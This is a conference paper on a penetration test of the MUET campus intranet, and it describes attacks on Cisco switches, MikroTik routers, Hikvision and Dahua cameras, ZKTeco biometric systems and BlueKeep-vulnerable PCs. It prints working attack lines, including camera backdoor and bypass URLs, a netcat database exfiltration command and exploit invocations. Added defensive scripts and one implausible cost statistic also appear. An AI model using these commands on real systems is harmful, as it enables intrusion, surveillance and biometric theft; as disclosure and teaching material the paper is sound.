
2nd International Conference on Computational Sciences and Technologies, 17-19 December 2020 (INCCST’20), MUET Jamshoro
ISBN-978-969-23372-1-2

Case Study: Intranet Penetration Testing of MUET

Shameel Syed ([email protected]), Faheem Khuhawar ([email protected]), Khizra Arain ([email protected]), Talha Kaimkhani, Zohaib Syed ([email protected]), Hasan Sheikh, Shahroz Khan
Department of Telecommunication, Mehran University of Engineering and Technology, Jamshoro, Pakistan

Abstract—Every organisation with its available resources requires its network to be secure from any sort of internal or external threat. This requires the implementation and proper assessment of overall security measures. In this paper, we highlight how an educational campus intra-network can be highly vulnerable due to improper configurations or inadequate security measures. Our investigation through penetration testing allowed us to gain access to more than 50% of the distribution and core switches from Cisco, IP cameras from Dahua and Hikvision, biometric systems from ZKTeco, MikroTik RouterOS, and PCs/servers having vulnerabilities such as BlueKeep. A systematic procedure is presented in this paper to perform the attacks, along with recommendations to implement proper security measures.

Keywords—Network Security; Penetration Testing; Testing; Exploitation; Attacks

I. INTRODUCTION

If a vulnerability is exploited by an unauthorized individual to access a company’s network, its resources can be compromised. The objective of a penetration test is to address vulnerabilities before they can be exploited. Penetration testing is a comprehensive method of testing the complete, integrated, operational system, consisting of hardware, software and people. There are three main types of penetration testing, namely black hat penetration testing, white hat penetration testing and grey hat penetration testing.

Black hat penetration testing scans the remote hosts for possible vulnerabilities with no prior knowledge of the target, analyzes the vulnerabilities and their possible risk, and finally reports them. White hat penetration testing is provided with significant knowledge of the target. It is a simulation of an attack by a penetration tester who has detailed knowledge of the network environment. Grey hat penetration testing, also called grey box analysis, is a strategy in which the tester has limited knowledge of the internal details of the network. The grey hat approach is used specifically when the threat of the attack is considered to be an inside job. We have used the grey hat approach in our research. Penetration testing has four steps to perform:

• Reconnaissance/Information Gathering
• Scanning
• Exploitation
• Post exploitation

Network scanning is a procedure for identifying devices on a network by employing features of the network protocol to signal devices and wait for a response. Most network scanning is used in monitoring and management, but scanning can also be used to identify network elements or users for attacks. An exploit is a piece of software, a sequence of commands or a chunk of data that takes advantage of a bug or vulnerability to cause unintended behavior to occur on target machines. Such unintended behaviors include gaining control of a system, allowing privilege escalation or Denial of Service (DoS) attacks. Most devices connected to the Internet these days are not maintained and monitored properly. Instead, these are devices that are often not understood as computers but are termed “things”, giving rise to the term “Internet of Things”.

II. LITERATURE REVIEW

A penetration test is defined as a controlled attempt to penetrate a network from outside in order to detect vulnerabilities [1]. In this age of continuously advancing technologies, every organization, whether it be a university, a hospital or a military organization, is network based. This makes work-related tasks more efficient and effective but also increases the risk of being targeted by a malicious threat, either for an agenda or for personal gain. This is where penetration testing is important. Offensive security techniques are used in order to discover possible flaws in the network. For an IoT company, it can be seen as an act of complementing the defensive security measures before IoT motes are deployed [2]. It is a basic instinct of a security expert to think like a criminal in order to fill the gaps from the criminal’s perspective. So, it is a basic necessity for the penetration tester to know as much as or more than what an attacker can know, in order to make the results meaningful [3].

Wireless connections are low cost and convenient for connecting network devices. The simplicity with which they provide connectivity is also a reason for attackers to target wireless networks. Therefore, authentication protocols have been made to keep unauthorized access out of the network. The two most commonly heard of encryption schemes for wireless networks are Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA). The WEP algorithm was made to secure wireless Internet connections in 1997, but it was vulnerable on many levels [4]. So WPA was developed as a second encryption standard, which solved many of the problems lying in WEP. The latest version of WPA is WPA2. WPA2 provides stronger encryption than the WPA-rated standard [5]. Both give the choice of two security modes, i.e., TKIP and AES encryption modes. The WPA2-PSK protocol can be used in a wireless distribution system. For home users, WPA2-PSK (AES Pre-Shared Key) is used. Corporate security is based on 802.1X, the EAP authentication framework that uses a RADIUS server, with methods such as EAP-TLS, which provides a much stronger authentication system and secure key distribution [6].

The greatest attack that engraved its name recently is WannaCry. WannaCry is a type of ransomware; ransomware is a type of malware that takes full control of the targeted system and demands a ransom for the safe return of the functionality of the system. WannaCry is software that makes use of EternalBlue and DoublePulsar. It started on May 12, 2017. EternalBlue is a well-known vulnerability in the Server Message Block (SMB) protocol employed by Microsoft Windows, operating on ports 445 and 139. Once the malware is injected into the machine, it searches for a backdoor. The WannaCry malware spread to over 300,000 systems in over 150 countries [7]. There was only one agenda of WannaCry: to collect ransom. It froze or completely locked down the target systems by applying encryption and demanded about $300 to $600 to release the lock.

CCTV cameras, which are the very eyes of an organization and keep security in check, can also be exploited. A cyber-attack on a Russian bank gave hackers access to 24,000 CCTV cameras in 30 different countries. This attack led the bank to lose more than 31 million USD [8]. Recently, a new vulnerability was disclosed in Microsoft’s RDP service which is considered to be as dangerous as EternalBlue. This paper also illustrates the exploitation of, and safety measures against, this vulnerability.

According to the estimate provided by the US Computer Emergency Response Team (CERT), almost 40 percent of IT security breaches are perpetrated by people inside the company. Additionally, the FBI/CSI risk assessment implied that many enterprises’ ports are open, and any laptop can plug into the network and gain access as a common practice. The total loss of the companies surveyed was approximately over 130 million USD, with average expenditure per employee being about 241 million USD per year. 28 percent of the employees stated they had no idea if they were attacked and how many times they were attacked. Yet about 32 percent of employees said they were never attacked from the inside.

This paper deals with the penetration test procedure for determining the security levels, so as to highlight the possible vulnerabilities that could be exploited in the Campus Area Network (CAN) of Mehran University of Engineering and Technology (MUET), including the IP cameras, biometric systems, and switches deployed within the network. This paper explains various data link protocols that have been compromised during the research. Although a lot of work has been done in the area of penetration testing, we have specifically followed standard penetration testing on the live network of Mehran University of Engineering and Technology using the grey hat approach.

III. METHODOLOGY

Network penetration testing has the following four steps.

A. Reconnaissance

Reconnaissance is the process of collecting information about the target without being discovered, and using that information to perform a detailed penetration test. Reconnaissance is the biggest phase any penetration tester goes through to identify devices on the network and their interconnection. The generic topology of the campus area network, obtained through a survey and later verified, is shown in Figure 1.

Fig. 1: Network Diagram of Campus Area Network

To gain basic information about DHCP, DNS and the subnet IP address, the following command was used.

username@hostname:~$ ifconfig

It was found that the subnet IP changed with the change of department, i.e., every department at MUET has a different subnet ID, and DHCP was part of it, whereas the local DNS information remained the same. ICMP (ping) messages were sent from one department to another, as a result of which it was realized that tagged information was being sent along with a VLAN ID. Using this approach, information about the VLANs of different departments was collected. Later, this information was verified after discovering misconfigured switches that allowed an unauthenticated bypass: if the first two or three sessions via the Telnet protocol are kept open beforehand, the fourth session allows an attacker to enter the switch without being prompted for any password.

username@hostname:~$ telnet 172.16.X.X

This allowed the Cisco IOS shell to be enabled, and eventually the configuration file can be read, through which the complete topology of MUET’s network can be discovered, i.e., how core, aggregation, distribution, and access switches are interconnected with one another. Furthermore, additional information, such as the rules of ACLs and the configuration of L2 protocols such as CDP, VTP, STP, and DTP, was also collected.

B. Scanning

The process of scanning identifies security weaknesses in the remote target network or local hosts. To achieve this, IP address information of live hosts and layer-2 devices was collected. Later, the targeted hosts were scanned for open ports using a tool called nmap.

username@hostname:~$ nmap -T4 -A -v

By this approach, tables of hosts with IP addresses and their corresponding MAC addresses, along with open ports, were made. Due to VLAN restrictions, initially the scan was done on each VLAN separately. Later on, after the exploitation of the core switch, detailed information was retrieved quickly and without any exhaustion.

C. Exploitation

1) Switches: The switches with open Telnet ports were targeted after a careful review of the scanning results. Upon attempting to access the switches, it was discovered that more than 50% of the switches used default credentials, irrespective of their vendors. Switches that had their default passwords changed were misconfigured, such as using vty 0 4, allowing access to the switch after 5 simultaneous virtual connection sessions. Figure 2 shows a snapshot of accessing the core switch.

Fig. 2: Accessing Core Switch

It was discovered that the “Cisco IOS Shell” was enabled, through which the configuration files of all of the core switches could be copied. From these configuration files, extensive information that helped in exploiting various L2 protocols was gathered. The password hashes of users having privilege level 15 and the password to enter the global configuration mode of the switch can also be retrieved from the configuration file; these were later cracked with the help of hashcat.¹

¹ The tool hashcat needs to be installed first on the PC (Linux or Windows).

This paper demonstrates the use of hashcat from Windows OS. Assuming that hashcat is installed on the C drive, the following command was used to brute-force the password, assuming that the password consisted of 6 characters, where crack.txt is the name of the file which stores the Cisco Type 5 hashes. The output of hashcat is shown in Figure 3.

C:\hashcat>hashcat64.exe -a 3 -m 500 crack.txt ?a?a?a?a?a?a

Switches with Cisco IOS are by default allowed to write data into flash storage; this was further exploited to write malicious code and trigger it to spread malware throughout the network. Figure 4 demonstrates the proof of writing and adding a text file into the core switch. All of the files in the flash storage of the switch can be seen, and the configuration file can be read using the cat command.

Fig. 3: Hashcat

Fig. 4: Writing data into the flash storage of core switch

Linksys switches have been exploited through a vulnerability called “The Moon”. This vulnerability can be exploited through Metasploit or Routersploit. Figure 5 demonstrates how it is done.

Fig. 5: Exploitation of Linksys switches

A remote network connection is a basic necessity for the management of enterprise networking devices. Routers and switches are accessed on a daily basis for tasks such as creating and removing VLANs and adding or removing interfaces. Access to the router/switch is done via either Telnet or Secure Shell (SSH). Using Telnet is rather common even though it is insecure. It is highly recommended that SSH be used instead of Telnet.

2) Routers: It was discovered that the router currently deployed on the campus was running MikroTik RouterOS 6.42.9. An easier approach was carried out in which a preinstalled tool called searchsploit was utilized in order to find the vulnerabilities of the vendor MikroTik. Figure 6 shows that MikroTik RouterOS v6.42.9 is listed as vulnerable in the exploit entry shown. To exploit it, the following command was used.

cat /usr/share/exploitdb/exploits/hardware/remote/46444.txt

Furthermore, the DoS attack defined in the exploits found by searchsploit can be performed on MikroTik RouterOS using the following command.

python /usr/share/exploitdb/exploits/hardware/dos/18817.py 172.16.X.X config 9

3) IP Cameras: Organizations pay no attention to security vulnerabilities before purchasing and deploying CCTV cameras. Our investigation led us to exploit IP cameras from different vendors; most of the vulnerabilities of these devices are well documented, yet they were still not patched. We demonstrate how easy it was to gain access to the CCTV system using a brute-force attack via a tool called Hydra. Figure 7 demonstrates how Hydra is used.

Fig. 6: Searching Exploits by Searchsploit

Fig. 7: Dictionary Attack on IP Cameras

From those IP cameras, the database was extracted, but the passwords were encrypted using the proprietary algorithm of the company. The password hashes were extracted from the database and those hashes were used to access cameras from Hikvision. This allowed access to the camera directly, suggesting a poor implementation from Hikvision and a vulnerability of these cameras.

Another downside of using IP cameras on the intranet is that the passwords have to be hashed offline, which means that the algorithm must be somewhere in the system. After exploring the camera, the algorithm was found to be in sofia.py. Figure 8 demonstrates how this algorithm converts “888888” to a hash.

Fig. 8: Hashing Algorithm

Afterwards, a script was written to perform a brute-force attack to find the passwords of the registered users, and thus access was gained to different cameras which were not accessible via Telnet. It was found that “Hikvision” and “Dahua” use the same algorithm to convert plain text into a hash. The database from some of the cameras was compromised due to the existence of a backdoor in the camera, using these different links on different cameras:

http://<IP>:<Port>/mnt/mtd/Config/Account1
http://<IP>:<Port>/mnt/mtd/Config/Password
http://<IP>:<Port>/current-config/Passowrd

After Dahua noticed that hackers had been accessing cameras using default usernames and passwords, they released a patch that disabled Telnet access. However, disabling the remote access turned out to be a much bigger obstacle for users accessing IP cameras than was thought, because in case usernames and passwords were forgotten, there was no way to access the cameras. To cope with that situation, Dahua provided a script to access cameras through Telnet.

http://<IP>:<Port>/cgi-bin/configManager.cgi?action=setConfig&Telnet.Enable=true

After entering the script, a username and password are asked for. But before the password, a string “7ujMko0” had to be added. For example, if the username and password are “admin”, the password has to be provided as “7ujMko0admin”. Recovered passwords retrieved from the previous methods were utilized with this string, and it also let default credentials open the Telnet door of various cameras.

In some cameras of Hikvision, entering the following script into the browser allows an attacker to bypass authentication.

http://<IP>:<Port>/Security/users?auth=YWRtaW46MTEK

Worse, by using this method, the configuration file of Hikvision cameras can also be downloaded.

http://<IP>:<Port>/System/configurationFile?auth=YWRtaW46MTEK

This configuration file contains usernames and passwords (in plain text) for all configured users. The files are encrypted, but the encryption is easily reversible because of the presence of a static encryption key which is derived from the password “abcdefg”.

http://<IP>:<Port>/onvif-http/snapshot?auth=YWRtaW46MTEK

The above script allows the attacker to take a snapshot from the IP camera, as can be seen in Figure 9.

Fig. 9: Snapshot Taken by Entering Script

This vulnerability also allows an attacker to change the password of the Hikvision IP cameras very easily, as demonstrated in Figure 10.

There is a protocol, “ONVIF”, which was enabled on the majority of the cameras, and it was left unprotected due to a lack of knowledge of this protocol. Through this protocol, the use of the following URL in software like “VLC Media Player” allows access to the IP cameras using default credentials.

rtsp://<IP>:<Port>/cam/realmonitor?channel=1&subtype=0&unicast=true&proto=Onvif

“ONVIF Device Manager” can be used to manage the cameras in which this protocol is enabled. This allows adding/deleting users, changing the movement of the camera, speaking into the camera, changing the DNS server, changing the NTP server and other features as well. The snapshot of using ONVIF to access IP cameras is shown in Figure 11.

Fig. 10: Software based on this vulnerability

Fig. 11: Accessing cameras using ONVIF
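The camera endpoints and the static auth value quoted in this section are also exactly what a defender can alert on. The following script is an added example written for this page, not code from the paper or from either vendor: it parses web access-log lines in combined format (the sample lines are constructed) and flags requests that hit the configuration, user-list, snapshot or Telnet-enable endpoints listed above, or that carry the fixed auth token. Run over a reverse-proxy or camera-VLAN HTTP log, it gives a per-source count of the activity this section describes.

```python
"""Flag access-log requests to the camera endpoints discussed in this paper.
Added example; the log lines below are constructed, not captured traffic."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Endpoints quoted in the paper (compared case-insensitively against the request path)
SENSITIVE_PATH_PREFIXES = (
    "/mnt/mtd/config/",            # Dahua account/password files served over HTTP
    "/current-config/",            # Dahua configuration export
    "/security/users",             # Hikvision user list
    "/system/configurationfile",   # Hikvision configuration download
    "/onvif-http/snapshot",        # Hikvision snapshot endpoint
    "/cgi-bin/configmanager.cgi",  # Dahua configuration CGI (Telnet.Enable lives here)
)
STATIC_AUTH_TOKEN = "YWRtaW46MTEK"  # the fixed auth value quoted in the paper

# Apache/nginx "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: two benign requests, one source probing a Hikvision unit,
# one source trying a Dahua file path.
SAMPLE_LOG = [
    '10.0.5.20 - - [10/Nov/2020:09:12:01 +0500] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.0.5.77 - - [10/Nov/2020:09:12:09 +0500] "GET /Security/users?auth=YWRtaW46MTEK HTTP/1.1" 200 812 "-" "curl/7.68.0"',
    '10.0.5.77 - - [10/Nov/2020:09:12:11 +0500] "GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1" 200 40960 "-" "curl/7.68.0"',
    '10.0.5.77 - - [10/Nov/2020:09:13:02 +0500] "GET /cgi-bin/configManager.cgi?action=setConfig&Telnet.Enable=true HTTP/1.1" 401 0 "-" "python-requests/2.24"',
    '10.0.5.31 - - [10/Nov/2020:09:15:40 +0500] "GET /mnt/mtd/Config/Account1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    '10.0.5.20 - - [10/Nov/2020:09:16:00 +0500] "GET /login.html HTTP/1.1" 200 2200 "-" "Mozilla/5.0"',
]


def classify_request(target):
    """Return the reasons (possibly none) a request target matches the camera findings."""
    reasons = []
    parts = urlsplit(target)
    path = parts.path.lower()
    query = parse_qs(parts.query)
    if path.startswith(SENSITIVE_PATH_PREFIXES):
        reasons.append("sensitive camera endpoint " + parts.path)
    if STATIC_AUTH_TOKEN in query.get("auth", []):
        reasons.append("static auth token in query string")
    if path.endswith("configmanager.cgi") and query.get("Telnet.Enable") == ["true"]:
        reasons.append("Telnet being enabled through configManager.cgi")
    return reasons


def scan_access_log(lines):
    """Parse log lines; return (list of finding dicts, Counter of findings per source IP)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a production monitor would count these too
        reasons = classify_request(m["target"])
        if reasons:
            findings.append({"ip": m["ip"], "time": m["time"], "target": m["target"],
                             "status": int(m["status"]), "reasons": reasons})
    return findings, Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits, per_source = scan_access_log(SAMPLE_LOG)
    for hit in hits:
        print(f'{hit["time"]} {hit["ip"]} {hit["status"]} {hit["target"]} -> {"; ".join(hit["reasons"])}')
    print("per source:", dict(per_source))
```

A 200 status on the user-list or configuration-file path is the case to treat as a confirmed exposure; a 401 or 404 still shows someone is trying the paths and is worth correlating with the Telnet and RTSP access described in this section.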

4) Bio-metric Systems: Biometric fingerprint systems are used throughout the campus for the purpose of attendance of faculty members, and in some organizations, biometric systems are used as locks for doors. Penetration testing was done on two models of ZKTeco, uFace800/ID and iClock880-H/ID. The embedded Linux platforms in these systems are ZEM220, ZEM600 and ZEM800.

The Telnet door was enabled on these machines and the default passwords were not changed, due to which access was gained into the systems after brute-forcing with the use of probable wordlists. Figure 12 demonstrates accessing the biometric system via Telnet.

Fig. 12: Accessing biometric via Telnet

First, database files were searched for using the following command.

find / -name '*.db'

It searches all the files in the system having the extension .db, which denotes a database file. After navigating to that directory, the database file was transferred using the tool netcat. The command from the sending side (ZEM220) was:

nc 172.16.23.32 9999 < ZKDB.db

172.16.23.32 is the IP of the PC where the file was to be received, but port 9999 had to be open on the receiving PC, which accepted the transferred file using the following command:

nc -l -p 9999 > ZKDB.db

Here, -l denotes that port 9999 is opened to listen for the remote connection. “sqlite” or any other software can be used to view the transferred file. After making changes, the .db file was uploaded to the system the same way it was downloaded, using the tool netcat.

UDP port 4370 of the ZK5000-ZK9000 allows anyone to connect to the system without any proper authentication. Custom commands can be created and sent to the device through UDP port 4370 to download information. This can be confirmed using the tool called Scapy from Linux OS. Alternatively, proprietary software of this company is also available which uses this port to connect to the device without a password. Although other versions of this software can be used to exploit this vulnerability, this has been confirmed by employing the software “ZKTeco 5.0” as shown in Figure 13.

Fig. 13: Snapshot of ZKTeco 5.0

This shows that one device has been connected without providing any password. The following actions can be performed with this software:

1) Add a user
2) Delete a user
3) Change privileges of users
4) Modify the attendance log sheet, i.e., change the time and nature of attendance

This database can be decrypted to extract the fingerprints of the users registered in the device; these extracted fingerprints can then be used against the user in various ways, i.e., impersonation, identity theft, etc.

5) Exploiting Vulnerabilities in an Operating System: In different networks of different organizations, there is a plethora of vulnerabilities to exploit, varying in accordance with the users. Different vulnerabilities were discovered in the scanning phase which have been exploited to gain access to various systems. One of the most common vulnerabilities used to access a system is EternalBlue, which can be exploited easily through the Metasploit framework. This paper focuses on the following two vulnerabilities.

Firstly, this paper demonstrates the exploitation of an old bug that has been present in Netatalk for a long time. Pea is a proof of concept which bypasses authentication to gain control of the execution flow of Netatalk, as shown in Figure 14. This vulnerability has been patched in 3.1.10. Further details of this explanation can be found on the website of NIST by searching for CVE-2018-1160.

Fig. 14: Exploitation of Netatalk 3.1.10

Secondly, this paper explains the exploitation of a vulnerability which is a hot topic these days. BlueKeep (CVE-2019-0708) is a recently found vulnerability that has been discovered in the RDP service of Microsoft. This is a wormable vulnerability which can be considered as dangerous as EternalBlue. After being exploited, this vulnerability provides an attacker with complete access to the host’s system.

From the scanning phase, information was gathered to know which hosts are using the RDP service of Microsoft. The following text demonstrates scanning them further with the Metasploit module, to evaluate how many of the hosts are vulnerable to the BlueKeep vulnerability.

msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set RHOSTS 172.16.100.3 172.16.100.5 172.16.100.6 172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11 ...
RHOSTS => 172.16.100.3 172.16.100.5 172.16.100.6 172.16.100.7 172.16.100.8 172.16.100.9 172.16.100.10 172.16.100.11 ...
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run
[*] 172.16.100.3:3389 - The target is not exploitable.
[*] 172.16.100.4:3389 - The target is not exploitable.
[*] Scanned 2 of 18 hosts (11% complete)
[+] 172.16.100.5:3389 - The target is vulnerable.
[*] 172.16.100.7:3389 - The target is not exploitable.
[*] Scanned 4 of 18 hosts (22% complete)
[+] 172.16.100.11:3389 - The target is vulnerable.
...

Since Metasploit had only recently launched the module for exploiting BlueKeep, the module had to be added manually.

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

After that, open Metasploit and run the following command, set RHOST to the target and launch the attack.

reload_all

After the attack was done, a meterpreter shell was provided through which complete access over the victim’s PC was gained, as can be seen in Figure 15.

Fig. 15: Exploiting BlueKeep

Other than exploiting devices as a whole, this work also focuses on exploiting protocols of the data-link layer in the TCP/IP suite. The main purpose of building the TCP/IP suite was to ensure that different layers work without knowledge of each other. But unfortunately, this means that if any one layer of the TCP/IP suite is attacked, the other layers will not get any idea of the problem. In networking, layer 2 is a very weak link and prone to attacks. The following layer-2 protocols have been compromised, namely ARP, VTP, STP, and DTP.

6) ARP Spoofing: ARP is used to discover the MAC address associated with a given IP address. A client can send an unsolicited reply, which is called a gratuitous ARP, and other hosts in the same subnet can save that information in their ARP tables. This way, anyone can claim to have any IP/MAC address. This is how ARP attacks redirect traffic. There are certain countermeasures to ARP spoofing attacks, such as using the DHCP snooping binding table, in which all ARP packets must match the binding table entries or else the ARP packets will be discarded. This is done when dynamic ARP inspection is enabled. In the network under consideration, DHCP snooping is enabled, but there is a proxy server deployed in the network which authenticates each time a request is sent. Since the proxy server is using the HTTP protocol, by poisoning the whole VLAN, the usernames and passwords of clients can be retrieved. The MITMf v0.9.8 tool is used to demonstrate the procedure, as shown in Figure 16. The example demonstrates ARP poisoning by setting the gateway address and target range.

Fig. 16: ARP Spoofing using MITMF
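Dynamic ARP inspection, mentioned above, is the switch-side control; a host or sensor on the VLAN can apply the same binding logic to the ARP replies it sees. The following added example (written for this page; not the paper's code and unrelated to MITMf) keeps a trusted binding for the gateway, learns other IP-to-MAC pairs on first sight, and alerts when an IP changes MAC or when one MAC claims more addresses than a single host normally would, which is the footprint of poisoning a gateway plus a target range as described above. The reply sequence is constructed; the 172.16.23.0/24 addressing is borrowed from the netcat example elsewhere in the paper.

```python
"""Host-side ARP binding monitor. Added example; the replies below are constructed."""
from collections import defaultdict


class ArpMonitor:
    """Track IP-to-MAC bindings seen in ARP replies and flag conflicts.

    trusted: bindings that must never change (gateway, DNS, proxy). An ARP
    reply contradicting one is the classic sign of gateway spoofing.
    max_ips_per_mac: one MAC claiming many addresses is what a VLAN-wide
    poisoning run against a target range looks like on the wire.
    """

    def __init__(self, trusted, max_ips_per_mac=3):
        self.trusted = {ip: mac.lower() for ip, mac in trusted.items()}
        self.learned = {}                   # IP -> MAC as first observed
        self.ips_by_mac = defaultdict(set)  # MAC -> every IP it has claimed
        self.max_ips_per_mac = max_ips_per_mac

    def observe(self, sender_ip, sender_mac):
        """Record one ARP reply; return the alerts it raises (empty list if benign)."""
        mac = sender_mac.lower()
        alerts = []
        if sender_ip in self.trusted:
            if self.trusted[sender_ip] != mac:
                alerts.append(f"{sender_ip} claimed by {mac}; trusted binding is {self.trusted[sender_ip]}")
        elif sender_ip in self.learned and self.learned[sender_ip] != mac:
            alerts.append(f"{sender_ip} changed from {self.learned[sender_ip]} to {mac}")
        self.learned.setdefault(sender_ip, mac)   # keep the first-seen binding, not the attacker's
        self.ips_by_mac[mac].add(sender_ip)
        if len(self.ips_by_mac[mac]) > self.max_ips_per_mac:
            alerts.append(f"{mac} now claims {len(self.ips_by_mac[mac])} addresses; possible VLAN-wide poisoning")
        return alerts


# Trusted gateway binding (constructed value a sensor would be provisioned with)
GATEWAY = {"172.16.23.1": "aa:bb:cc:00:00:01"}

# (sender IP, sender MAC) of successive ARP replies; constructed sequence
SAMPLE_ARP_REPLIES = [
    ("172.16.23.1", "aa:bb:cc:00:00:01"),   # gateway answers normally
    ("172.16.23.10", "de:ad:be:ef:00:10"),  # ordinary hosts
    ("172.16.23.11", "de:ad:be:ef:00:11"),
    ("172.16.23.1", "0c:0c:0c:0c:0c:0c"),   # one MAC starts claiming the gateway...
    ("172.16.23.10", "0c:0c:0c:0c:0c:0c"),  # ...and then every host in a target range
    ("172.16.23.11", "0c:0c:0c:0c:0c:0c"),
    ("172.16.23.12", "0c:0c:0c:0c:0c:0c"),
]


def run_monitor(replies=SAMPLE_ARP_REPLIES, trusted=GATEWAY):
    """Feed a reply sequence through the monitor and collect every alert raised."""
    monitor = ArpMonitor(trusted)
    alerts = []
    for ip, mac in replies:
        alerts.extend(monitor.observe(ip, mac))
    return alerts


if __name__ == "__main__":
    for alert in run_monitor():
        print("ALERT:", alert)
```

Feeding it live traffic means reading ARP replies from a capture (for example with Scapy, which the paper already uses) and calling observe() per packet; the trusted table should come from the same source of truth as the switches' DHCP snooping bindings so the two views agree.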

7) DTP Attack: A switch port is configured in one of two ways: as an access port or as a dynamic port. When a host is connected to a switch, an access port is used. With VLANs implemented, each access port is assigned to only one VLAN. A trunk port, on the contrary, allows the traffic of multiple VLANs to pass through. A trunk port can be configured via a Cisco proprietary protocol called Dynamic Trunking Protocol (DTP). DTP automates the IEEE 802.1x/ISL trunk configuration. It does not operate on routers. DTP synchronizes the trunking mode at both ends of a link. The DTP state of a trunking port can be set to “Auto”, “On”, “Off”, “Desirable”, or “Nonegotiate”.

In a switch spoofing attack, the attacker impersonates a switch in order to trick a legitimate switch into creating a trunk link between them. As already mentioned, packets of any VLAN are allowed to pass through a trunk link, so once the link is established, traffic from any VLAN can be accessed by the attacker. The success of this exploit depends solely on the legitimate switch being configured in “Dynamic Desirable”, “Dynamic Auto” or “Trunk” mode. Since the switches under consideration were configured as “Auto”, a switch spoofing attack was performed using the tool Yersinia v0.8.2, as shown in Figure 17, and a trunk link was formed.

Fig. 17: DTP attack using Yersinia

It can be clearly seen that the port was first assigned as an access port and then turned into a trunk link after the successful DTP attack. This attack also provides a way for a VLAN hopping / double encapsulation attack. It can be prevented by manually assigning each port as an access or trunk port. Further security measures include using a VLAN other than the default VLAN as the native VLAN.

8) VTP Attack: Switches are added to a VTP domain in order to use VTP. The VTP domain is defined on a VTP server, and later on the client and transparent devices as well. Whenever a new VLAN is added on the VTP server, the server automatically distributes this information to all switches in the VTP domain. All switches except the VTP server are defined as client switches, whose task is to listen for VLAN changes from the VTP server. Switches configured as transparent simply forward the VTP information without altering their own VLAN assignments. This is very useful when many switches are involved in the network, since all VLAN information can be altered from one place and propagated automatically by the VTP server. On the other hand, there is a risk that an attacker could exploit this convenience by creating a rogue VTP server and gaining complete control over the VLANs of the VTP domain. To remedy that, VTP implements MD5-based authentication of VTP frames: the VTP server holds a password for authenticating the switches of the VTP domain, and without that password switches will not accept VTP information. The password is sent as an MD5 hash, which is verified and used by the client switch. There are two main requirements for injecting VTP frames. The attacker's port must be turned into a trunk (via the DTP attack), and the VTP configuration revision number must be higher than that of the previous VTP advertisements so that the update is applied. A VTP attack is then carried out by adding or deleting VLANs via the rogue VTP server.

Fig. 18: VTP Information

A rogue VTP server can be created on any switch by increasing the revision number above the previous one (the previous revision number was known from viewing the VTP information on the core switch, as shown in Figure 18). After the command to change the VLAN configuration was sent via the rogue VTP server, the MD5 hash was sent with that frame, and the malicious frame was accepted without objection since the hash authenticated. This was done using the tool Yersinia. It is important to note that this exploitation of the MD5 hash was possible because the switches were configured with VTP version 2. The remedy is to implement VTP version 3. VTPv3 introduces a status made up of primary and secondary VTP servers: primary status is used only when there is a need to make changes, and all other switches are secondary by default, which secures the network from this attack.
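As an added example (not code from the paper), a Python model of how a client switch decides whether to apply a VTP advertisement under VTPv2 and VTPv3, showing why the primary-server rule of VTPv3 is the remedy. The digest is a simplified stand-in for the real VTP MD5 layout, and the domain name, password, revision and switch identities are assumptions:

```python
"""VTP update acceptance on a client switch, VTPv2 versus VTPv3.
Added example, not from the paper. The digest is a simplified stand-in
(MD5 over password, domain, revision and VLAN list), not the real VTP
frame digest; domain, password and switch IDs are constructed."""
import hashlib
from dataclasses import dataclass
def vtp_digest(password: str, domain: str, revision: int, vlans: tuple) -> str:
    raw = f"{password}|{domain}|{revision}|{','.join(map(str, vlans))}"
    return hashlib.md5(raw.encode()).hexdigest()

@dataclass(frozen=True)
class VtpAdvert:
    domain: str
    revision: int
    vlans: tuple
    digest: str
    source_id: str   # identity of the advertising switch

@dataclass
class VtpClient:
    version: int
    domain: str
    password: str
    revision: int
    vlans: tuple
    primary_id: str  # VTPv3: the only server allowed to change the VLAN database

    def check(self, adv: VtpAdvert) -> str:
        """Return 'accept' or the reason the advert is ignored."""
        if adv.domain != self.domain:
            return "domain mismatch"
        if adv.digest != vtp_digest(self.password, adv.domain, adv.revision, adv.vlans):
            return "bad MD5 digest"
        if adv.revision <= self.revision:
            return "revision not newer"
        # VTPv2 stops here: any switch holding the password and a higher revision wins.
        if self.version >= 3 and adv.source_id != self.primary_id:
            return f"{adv.source_id} is not the primary server"
        return "accept"

def make_advert(source_id: str, password: str, client: VtpClient, vlans: tuple) -> VtpAdvert:
    """Constructed advert with a revision one higher than the client's."""
    rev = client.revision + 1
    digest = vtp_digest(password, client.domain, rev, vlans)
    return VtpAdvert(client.domain, rev, vlans, digest, source_id)

def new_client(version: int) -> VtpClient:
    # Constructed client: revision 42 (as read from a core switch), VLANs 1, 10, 20.
    return VtpClient(version, "lab-domain", "vtp-secret", 42, (1, 10, 20), "core-sw")
```

Under VTPv2 `check` returns "accept" for an advert from any switch that carries the password and a higher revision; under VTPv3 the same advert is refused unless it comes from the primary server.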

